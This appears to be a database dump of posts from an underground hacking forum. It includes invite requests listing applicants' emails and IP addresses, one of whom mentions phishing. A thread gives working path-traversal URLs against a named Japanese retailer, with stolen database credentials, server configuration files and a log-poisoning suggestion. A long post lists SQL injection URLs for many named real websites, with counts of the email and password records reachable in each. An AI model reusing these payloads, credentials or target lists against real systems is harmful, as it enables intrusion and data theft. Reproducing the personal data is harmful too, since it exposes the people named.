https://twitter.com/hashtag/emrakul | https://twitter.com/hashtag/emrakul \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1766, 1566, 0, 'Invite', 2, '{$name}', 1408811106, '[SIZE=\'4\'][COLOR=\'Sienna\']rus_64[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: rukus84@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 196.217.168.9\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.match.com/profile/showprofile.aspx/?...rus64... | http://www.match.com/profile/showprofile.aspx/?...rus64... \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1767, 1567, 0, 'Invite', 2, '{$name}', 1408811108, '[SIZE=\'4\'][COLOR=\'Sienna\']rus_64[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: rukus84@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 196.217.168.9\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.match.com/profile/showprofile.aspx/?...rus64... | http://www.match.com/profile/showprofile.aspx/?...rus64... \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1768, 1083, 1119, 'BigBear', 34, '', 1408813043, '[url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../etc/passwd%00.jpg[/url]\n\n[url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../web/cgi-bin/login.cgi%00.jpg[/url]\n\nrequire \"/web/plib/R2/libcommon.pl\";\nrequire \"/web/plib/libenv.pl\";\nrequire \"/web/plib/libhtml.pl\";\nrequire \"/web/plib/R2/libcookie.pl\";\nrequire \"/web/plib/R2/libdatabase.pl\";\nrequire \"/web/plib/sql_regist.pl\";\nrequire \"/web/plib/libutil.pl\";\nrequire \"/web/plib/jcode.pl\";\nrequire \"/web/plib/librate.pl\";\nrequire \"/web/cgi-bin/get_hosp.pl\";\nrequire \"/web/cgi-bin/get_cgi_frame_templ.pl\";\n\n# $Id: libdatabase.pl 60 2005-07-07 11:58:38Z funa $ #\n\nmy $FMOS_IP=\"FMOS\";\nmy $FMOS_ID=\"ectora\";\nmy $FMOS_PW=\"ec2004\";\n\nmy $IMOS_IP=\"IMOS\";\nmy $IMOS_ID=\"ectora\";\nmy $IMOS_PW=\"ec2004\";\n\nmy $FMOSR_IP=\"FMOSR\";\nmy $FMOSR_ID=\"ectora\";\nmy $FMOSR_PW=\"ec2004\";', 1, 0, '', 0, 1, 0, 0, 0), (1769, 1083, 1768, 'ropertus', 33, '', 1408832714, '/opt/apache2/conf/vhost.conf\r\n[code]\r\n #\r\n# Use name-based virtual hosting.\r\n#\r\n\r\nNameVirtualHost *:80\r\n\r\n# Default Setting\r\n\r\n ServerAdmin webmaster@toranoana.co.jp\r\n DocumentRoot \"/web/default/htdocs\"\r\n ServerName _default_\r\n ScriptAlias /cgi-bin/ \"/web/default/cgi-bin/\"\r\n \r\n AllowOverride None\r\n Options None\r\n Order allow,deny\r\n Allow from all\r\n \r\n \r\n Options +Includes\r\n Options +ExecCGI\r\n AllowOverride All\r\n Order allow,deny\r\n Allow from all\r\n \r\n \r\n order deny,allow\r\n deny from all\r\n \r\n ErrorLog \"|/opt/apache2/bin/rotatelogs /var/toralog/default/error-%y-%m-%d.log 86400 540\"\r\n CustomLog \"|/opt/apache2/bin/rotatelogs /var/toralog/default/access-%y-%m-%d.log 86400 540\" combined\r\n\r\n\r\n#-----------------------------------------------------------\r\n# www.toranoana.jp\r\n#-----------------------------------------------------------\r\n\r\n ServerAdmin webmaster@toranoana.co.jp\r\n DocumentRoot \"/web/htdocs\"\r\n ServerName www.toranoana.jp\r\n ServerAlias tra-w7s.toranoana.jp\r\n ErrorDocument 401 /error/401.html\r\n ErrorDocument 403 /error/403.html\r\n ErrorDocument 404 /error/404.html\r\n ErrorDocument 500 /error/500.html\r\n ScriptAlias /cgi-bin/ \"/web/cgi-bin/\"\r\n\r\n PerlLoadModule Filters::UniGoogleAnalytics\r\n\r\n \r\n Options +Includes\r\n Options +ExecCGI\r\n AllowOverride All\r\n Order allow,deny\r\n Allow from all\r\n \r\n \r\n Options +Includes\r\n Options +ExecCGI\r\n AllowOverride All\r\n Order allow,deny\r\n Allow from all\r\n \r\n \r\n order deny,allow\r\n deny from all\r\n \r\n\r\n # --- esmart auth\r\n SetEnvIfNoCase User-Agent \"Googlebot\" ROBOT\r\n SetEnvIfNoCase User-Agent \"msnbot\" ROBOT\r\n SetEnvIfNoCase User-Agent \"Slurp\" ROBOT\r\n SetEnvIfNoCase Cookie \"afg=0\" ADULTONLY\r\n SetEnvIfNoCase Cookie \"afg=1\" ADULTONLY\r\n \r\n ErrorDocument 403 /esmart_auth/index.html\r\n Allow from env=ADULTONLY\r\n Allow from env=ROBOT\r\n Deny from All\r\n \r\n\r\n \r\n PerlOutputFilterHandler Filters::UniGoogleAnalytics\r\n \r\n\r\n ErrorLog \"|/opt/apache2/bin/rotatelogs /var/toralog/tra-w7s/error-%y-%m-%d-%p.log 43200 540\"\r\n CustomLog \"|/opt/apache2/bin/rotatelogs /var/toralog/tra-w7s/access-%y-%m-%d-%p.log 43200 540\" combined\r\n\r\n\r\n#-----------------------------------------------------------\r\n# www.toranoana.co.jp\r\n#-----------------------------------------------------------\r\n\r\n ServerAdmin webmaster@toranoana.co.jp\r\n DocumentRoot /web/htdocs_cojp\r\n ServerName www.toranoana.co.jp\r\n ServerAlias www.mirror.toranoana.co.jp\r\n ErrorDocument 401 /error/401.html\r\n ErrorDocument 403 /error/403.html\r\n ErrorDocument 404 /error/404.html\r\n ErrorDocument 500 /error/500.html\r\n ScriptAlias /cgi-bin/ \"/web/cgi-bin_cojp/\"\r\n\r\n PerlLoadModule Filters::UniGoogleAnalytics\r\n\r\n \r\n AllowOverride None\r\n Options None\r\n Order allow,deny\r\n Allow from all\r\n \r\n \r\n Options +Includes\r\n Options +ExecCGI\r\n AllowOverride All\r\n Order allow,deny\r\n Allow from all\r\n \r\n \r\n order deny,allow\r\n deny from all\r\n \r\n\r\n \r\n PerlOutputFilterHandler Filters::UniGoogleAnalytics\r\n \r\n\r\n ErrorLog \"|/opt/apache2/bin/rotatelogs /var/toralog/tra-w7s-cojp/error-%y-%m-%d.log 86400 540\"\r\n CustomLog \"|/opt/apache2/bin/rotatelogs /var/toralog/tra-w7s-cojp/access-%y-%m-%d.log 86400 540\" combined\r\n\r\n\r\n# --- end of config\r\n[/CODE]', 1, 1, '', 0, 2, 0, 0, 0), (1770, 1083, 1768, 'ropertus', 33, '', 1408833031, '[QUOTE=BigBear;1768][url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../etc/passwd%00.jpg[/url]\r\n\r\n[url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../web/cgi-bin/login.cgi%00.jpg[/url]\r\n\r\nrequire \"/web/plib/R2/libcommon.pl\";\r\nrequire \"/web/plib/libenv.pl\";\r\nrequire \"/web/plib/libhtml.pl\";\r\nrequire \"/web/plib/R2/libcookie.pl\";\r\nrequire \"/web/plib/R2/libdatabase.pl\";\r\nrequire \"/web/plib/sql_regist.pl\";\r\nrequire \"/web/plib/libutil.pl\";\r\nrequire \"/web/plib/jcode.pl\";\r\nrequire \"/web/plib/librate.pl\";\r\nrequire \"/web/cgi-bin/get_hosp.pl\";\r\nrequire \"/web/cgi-bin/get_cgi_frame_templ.pl\";\r\n\r\n# $Id: libdatabase.pl 60 2005-07-07 11:58:38Z funa $ #\r\n\r\nmy $FMOS_IP=\"FMOS\";\r\nmy $FMOS_ID=\"ectora\";\r\nmy $FMOS_PW=\"ec2004\";\r\n\r\nmy $IMOS_IP=\"IMOS\";\r\nmy $IMOS_ID=\"ectora\";\r\nmy $IMOS_PW=\"ec2004\";\r\n\r\nmy $FMOSR_IP=\"FMOSR\";\r\nmy $FMOSR_ID=\"ectora\";\r\nmy $FMOSR_PW=\"ec2004\";[/QUOTE]\r\n\r\nYou can try poison error log here: [url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../../opt/apache2/logs/error_log%00[/url]\r\n\r\nHere is the apache config: [url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../../opt/apache2/conf/httpd.conf%00[/url]\r\n\r\nAnd here is vhosts config: [url]http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../../../opt/apache2/conf/vhost.conf%00[/url]', 1, 1, '', 0, 1, 0, 0, 0), (1771, 1568, 0, 'Invite', 2, '{$name}', 1408835460, '[SIZE=\'4\'][COLOR=\'Sienna\']xrahitel[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: xrahitel@exploit.im\n[b]e-mail[/b]: xrahitelserves@gmail.com\n[b]Info[/b]: was zanemalsya many fishinga,here are the sites where my publications\r\n\r\n https://exploit.in/forum/index.php?showuser=51843\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 83.149.48.68\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/a_hranit | http://vk.com/a_hranit \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1772, 1569, 0, 'Invite', 2, '{$name}', 1408843441, '[SIZE=\'4\'][COLOR=\'Sienna\']Hookedonirc[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: hookedonirc@gmail.com\n[b]Info[/b]: 20 years all aspects of IT, Security, Brain and wetware hacking. \r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 50.140.155.224\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://hookedonirc.blogspot.com | hookedonirc.blogspot.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1773, 1570, 0, 'Invite', 2, '{$name}', 1408868753, '[SIZE=\'4\'][COLOR=\'Sienna\']Naven[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: NONE\n[b]e-mail[/b]: naven@noreply.pl\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 89.74.202.96\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://naven.se | naven.se \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1774, 1571, 0, 'l3n0', 44, 'Random SQLi Website with Email password count', 1408885182, '[CODE]swimsa.co.za\r\nURL:http://www.swimsa.co.za/archive.asp?id=[t]\r\nMethod:MS SQL Error\r\nSearch:password\r\nRows:2\r\n[2] SwimSA.ssa_users\r\nTotal Rows:128\r\nSearch:user\r\nRows:126\r\n[104] SwimSA.ssa_votepolls\r\n[12] SwimSA.ssa_toolusers\r\n[8] SwimSA.ssa_photogalleries\r\n[2] SwimSA.ssa_users\r\n\r\nonlinegrapevine.com\r\nURL:http://onlinegrapevine.com/categorylist.asp?categoryID=40\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:207\r\n[141] onlinegrapevine.d_report\r\n[65] onlinegrapevine.d_vendor\r\n[1] onlinegrapevine.d_consumer\r\n\r\ncanuckrecruiter.com\r\nURL:https://www.canuckrecruiter.com/SearchJobsByCategory.asp?id=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:239\r\n[234] canuckrecruiter.jobs\r\n[3] canuckrecruiter.Administrators\r\n[2] canuckrecruiter.EmployerAgents\r\nTotal Rows:242\r\nSearch:admin\r\nRows:3\r\n[3] canuckrecruiter.Administrators\r\nTotal Rows:247\r\nSearch:password\r\nRows:5\r\n[3] canuckrecruiter.Administrators\r\n[2] canuckrecruiter.EmployerAgents\r\n\r\nwplrc.com\r\nURL:http://wplrc.com/home.asp?id=41\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:664\r\n[150] wplrc.wp_member\r\n[139] wplrc.wp_college\r\n[132] wplrc.wp_email\r\n[115] wplrc.wp_article\r\n[99] wplrc.wp_registration\r\n[13] wplrc.wp_event\r\n[12] wplrc.wp_location\r\n[4] wplrc.wp_user\r\nTotal Rows:917\r\nSearch:password\r\nRows:253\r\n[150] wplrc.wp_member\r\n[99] wplrc.wp_registration\r\n[4] wplrc.wp_user\r\nTotal Rows:1,080\r\nSearch:user\r\nRows:163\r\n[115] wplrc.wp_article\r\n[44] wplrc.wp_curriculum\r\n[4] wplrc.wp_user\r\n\r\ncalcalit-tamar.co.il\r\nURL:http://www.calcalit-tamar.co.il/index.asp?id=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:369\r\n[301] scool_yamm.Forum\r\n[35] scool_yamm.tblForumMessages\r\n[30] scool_yamm.tblStudent\r\n[3] scool_yamm.clientBag\r\nTotal Rows:411\r\nSearch:admin\r\nRows:42\r\n[35] scool_yamm.tblForumMessages\r\n[7] scool_yamm.tblForumList\r\nTotal Rows:508\r\nSearch:user\r\nRows:97\r\n[62] scool_yamm.Users\r\n[35] scool_yamm.tblForumMessages\r\n\r\nfellston.com\r\nURL:http://www.fellston.com/category.asp?id=[t]\r\nMethod:MS SQL Error\r\nSearch:admin\r\nRows:22\r\n[22] marketing.EC_COUPON_T\r\nTotal Rows:25\r\nSearch:password\r\nRows:3\r\n[3] marketing.MT_USER_T\r\nTotal Rows:655\r\nSearch:user\r\nRows:630\r\n[630] marketing.EC_DISTRIBUTORS_T\r\n\r\nacheipuzzles.com\r\nURL:http://acheipuzzles.com/products.asp?keyword=digite a palavra chave\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:7,343\r\n[7,316] acheipuzzlesdb.customers\r\n[17] acheipuzzlesdb.ordertracking\r\n[9] acheipuzzlesdb.shoprma\r\n[1] acheipuzzlesdb.mycompany\r\nTotal Rows:7,345\r\nSearch:admin\r\nRows:2\r\n[2] acheipuzzlesdb.tbluser\r\nTotal Rows:14,663\r\nSearch:password\r\nRows:7,318\r\n[7,316] acheipuzzlesdb.customers\r\n[2] acheipuzzlesdb.tbluser\r\nTotal Rows:26,511\r\nSearch:user\r\nRows:11,848\r\n[7,316] acheipuzzlesdb.customers\r\n[4,531] acheipuzzlesdb.tbllog\r\n[1] acheipuzzlesdb.ups_config\r\n\r\nzf3d.com\r\nURL:http://www.zf3d.com/Products.asp?Id=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:152,824\r\n[143,892] zf3ddate.Tx_User\r\n[8,522] zf3ddate.zuopin\r\n[253] zf3ddate.Tx_Guest\r\n[156] zf3ddate.zp_gstj\r\n[1] zf3ddate.Tx_Const\r\nTotal Rows:177,355\r\nSearch:admin\r\nRows:24,531\r\n[24,276] zf3ddate.Tx_Cret\r\n[253] zf3ddate.Tx_Guest\r\n[2] zf3ddate.Tx_Admin\r\nTotal Rows:9,080,347\r\nSearch:user\r\nRows:8,902,992\r\n[5,983,873] zf3ddate.henji\r\n[2,307,339] zf3ddate.guankan\r\n[143,892] zf3ddate.Tx_User\r\n[97,433] zf3ddate.Tx_Bbs\r\n[85,596] zf3ddate.tuijian\r\n[71,154] zf3ddate.shipin_guankan\r\n[62,860] zf3ddate.liulan\r\n[39,373] zf3ddate.rw_tj\r\n[33,873] zf3ddate.yh_kwkc\r\n[24,276] zf3ddate.Tx_Cret\r\n[16,531] zf3ddate.shoushuo\r\n[11,467] zf3ddate.Tx_News\r\n[8,522] zf3ddate.zuopin\r\n[6,402] zf3ddate.renwu_gzd\r\n[5,426] zf3ddate.zhifu\r\n[2,149] zf3ddate.Tx_xilie\r\n[699] zf3ddate.map\r\n[655] zf3ddate.rc_grtj\r\n[503] zf3ddate.huiyuan_pinglun\r\n[379] zf3ddate.zp_zwyq\r\n[253] zf3ddate.Tx_Guest\r\n[156] zf3ddate.zp_gstj\r\n[143] zf3ddate.mubiao\r\n[36] zf3ddate.Tx_Board\r\n[2] zf3ddate.Tx_Admin\r\n\r\ntruckcarsrv.com\r\nURL:http://www.truckcarsrv.com/usedrvs/view_rv_details.php?MID=999999.9\' union all select 1,2,3,4,5,6,7,8,9,10,11,[t],13,14,15,16,17,18,19,20,21,22,23,24,25 and \'0\'=\'0\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:177,995\r\n[175,352] remarkab_wrdp1.wp_tml_emails\r\n[2,642] remarkab_wrdp1.wp_comments\r\n[1] remarkab_wrdp1.wp_users\r\nTotal Rows:179,138\r\nSearch:password\r\nRows:1,143\r\n[1,143] remarkab_wrdp1.wp_posts\r\nTotal Rows:181,806\r\nSearch:user\r\nRows:2,668\r\n[2,642] remarkab_wrdp1.wp_comments\r\n[24] remarkab_wrdp1.wp_usermeta\r\n[1] remarkab_wrdp1.user\r\n[1] remarkab_wrdp1.wp_users\r\n\r\nexpropriationlaw.ca\r\nURL:http://www.expropriationlaw.ca/news/news.asp?id=999999.9 union all select 1,2,[t],4,5\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:2,734\r\n[2,038] jbm_exlaw1.t600_ads\r\n[328] jbm_exlaw1.t300\r\n[184] jbm_exlaw1.t202\r\n[181] jbm_exlaw1.t_directory\r\n[1] jbm_exlaw1.t203\r\n[1] jbm_exlaw1.t305\r\n[1] jbm_exlaw1.t601_ad_settings\r\nTotal Rows:2,737\r\nSearch:admin\r\nRows:3\r\n[1] jbm_exlaw1.t203\r\n[1] jbm_exlaw1.t305\r\n[1] jbm_exlaw1.t601_ad_settings\r\nTotal Rows:2,939\r\nSearch:password\r\nRows:202\r\n[200] jbm_exlaw1.t502_subscribers\r\n[1] jbm_exlaw1.t203\r\n[1] jbm_exlaw1.t601_ad_settings\r\nTotal Rows:9,056\r\nSearch:user\r\nRows:6,117\r\n[3,236] jbm_exlaw1.t100\r\n[2,038] jbm_exlaw1.t600_ads\r\n[328] jbm_exlaw1.t300\r\n[200] jbm_exlaw1.t502_subscribers\r\n[181] jbm_exlaw1.t_directory\r\n[132] jbm_exlaw1.t304\r\n[1] jbm_exlaw1.t203\r\n[1] jbm_exlaw1.t601_ad_settings\r\n\r\nmapsinternational.co.uk\r\nURL:http://www.mapsinternational.co.uk/product_details.asp?id=94 or 1=[t] and 1=1\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:204,781\r\n[68,609] mapsinter.transaction_view\r\n[64,460] mapsinter.transactions_userdetails\r\n[63,257] mapsinter.users\r\n[3,846] mapsinter.grouponcanvasorders\r\n[1,636] mapsinter.grouponorders\r\n[1,252] mapsinter.grouponordersbu\r\n[853] mapsinter.micompetition\r\n[483] mapsinter.productreviews\r\n[176] mapsinter.kgborders\r\n[132] mapsinter.lsdoodleorders\r\n[33] mapsinter.littlebirdorders\r\n[26] mapsinter.mios_resellers\r\n[15] mapsinter.savvymummysorders\r\n[3] mapsinter.mios_login\r\nTotal Rows:331,902\r\nSearch:admin\r\nRows:127,121\r\n[68,609] mapsinter.transaction_view\r\n[58,512] mapsinter.schools\r\nTotal Rows:331,911\r\nSearch:password\r\nRows:9\r\n[6] mapsinter.admin\r\n[3] mapsinter.mios_users\r\nTotal Rows:401,425\r\nSearch:user\r\nRows:69,514\r\n[68,609] mapsinter.transaction_view\r\n[874] mapsinter.mios_quotes\r\n[23] mapsinter.mios_clients\r\n[6] mapsinter.admin\r\n[2] mapsinter.returns\r\n\r\nengex-uk.co.uk\r\nURL:http://www.engex-uk.co.uk/product-details.asp?productID=32\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:password\r\nRows:4\r\n[1] cefdb.addvent_login\r\n[1] cefdb.challenger_login\r\n[1] cefdb.engex_login\r\n[1] cefdb.heatstore_login\r\nTotal Rows:11\r\nSearch:user\r\nRows:7\r\n[1] cefdb.addvent_login\r\n[1] cefdb.avs_login\r\n[1] cefdb.challenger_login\r\n[1] cefdb.emitex_login\r\n[1] cefdb.engex_login\r\n[1] cefdb.ethos_login\r\n[1] cefdb.heatstore_login\r\n\r\nmarketindia.com\r\nURL:http://marketindia.com/show_item_details.asp?item_id=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:9,794\r\n[4,962] marketi_bsh.orders\r\n[2,696] marketi_bsh.user_info\r\n[2,136] marketi_bsh.solicitation\r\nTotal Rows:12,490\r\nSearch:password\r\nRows:2,696\r\n[2,696] marketi_bsh.user_info\r\n\r\nmedguard.net\r\nURL:http://www.medguard.net/store/search_results.asp?txtsearchParamCat=[t]&txtsearchParamType=ALL&txtsearchParamMan=ALL&txtsearchParamVen=ALL&iLevel=1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:1,665\r\n[865] medguard.sfCShipAddresses\r\n[795] medguard.sfCustomers\r\n[2] medguard.sfAffiliates\r\n[1] medguard.sfAdmin\r\n[1] medguard.sfManufacturers\r\n[1] medguard.sfVendors\r\nTotal Rows:1,666\r\nSearch:admin\r\nRows:1\r\n[1] medguard.sfAdmin\r\nTotal Rows:1,669\r\nSearch:password\r\nRows:3\r\n[2] medguard.sfAffiliates\r\n[1] medguard.sfAdmin\r\nTotal Rows:1,670\r\nSearch:user\r\nRows:1\r\n[1] medguard.sfAdmin\r\n\r\npeacehospice.co.uk\r\nURL:http://peacehospice.co.uk/viewevent.asp?eventID=387\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:5,739\r\n[3,370] peacehospicenew.tblorders\r\n[1,005] peacehospicenew.form_teamemail\r\n[446] peacehospicenew.news\r\n[423] peacehospicenew.event\r\n[198] peacehospicenew.vsp\r\n[104] peacehospicenew.job\r\n[80] peacehospicenew.lol_ceremony\r\n[71] peacehospicenew.ecard_creates\r\n[34] peacehospicenew.shopvsp\r\n[7] peacehospicenew.ecard_registrations\r\n[1] peacehospicenew.lol_settings\r\nTotal Rows:5,767\r\nSearch:password\r\nRows:28\r\n[21] peacehospicenew.security\r\n[7] peacehospicenew.ecard_registrations\r\nTotal Rows:8,125\r\nSearch:user\r\nRows:2,358\r\n[2,337] peacehospicenew.logged\r\n[21] peacehospicenew.security\r\n\r\ntavlit.co.il\r\nURL:http://www.tavlit.co.il/index.asp?module=catalog&item_id=50¤t_product=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:139\r\n[123] tavlit.Members\r\n[14] tavlit.Contact\r\n[2] tavlit.Users\r\nTotal Rows:141\r\nSearch:admin\r\nRows:2\r\n[2] tavlit.Users\r\nTotal Rows:266\r\nSearch:password\r\nRows:125\r\n[123] tavlit.Members\r\n[2] tavlit.Users\r\nTotal Rows:405\r\nSearch:user\r\nRows:139\r\n[123] tavlit.Members\r\n[14] tavlit.Contact\r\n[2] tavlit.Users\r\n\r\nrcatelecanada.com\r\nURL:http://www.rcatelecanada.com/item.asp?itemnmbr=RLC2253A\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:962\r\n[962] CI.RM00101\r\nTotal Rows:762,976\r\nSearch:user\r\nRows:762,014\r\n[694,779] CI.X_Curt_Log\r\n[53,786] CI.X_Curt_Performance\r\n[5,071] CI.X_Curt_OrderHistory_Web\r\n[3,897] CI.X_Curt_Available_Records_Web\r\n[3,518] CI.X_Curt_OrderReports\r\n[962] CI.RM00101\r\n[1] CI.XTest\r\n\r\nanntonys.com\r\nURL:http://www.anntonys.com/shop.asp?cat=11\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:26,746\r\n[26,311] anntonys.requestinfo\r\n[435] 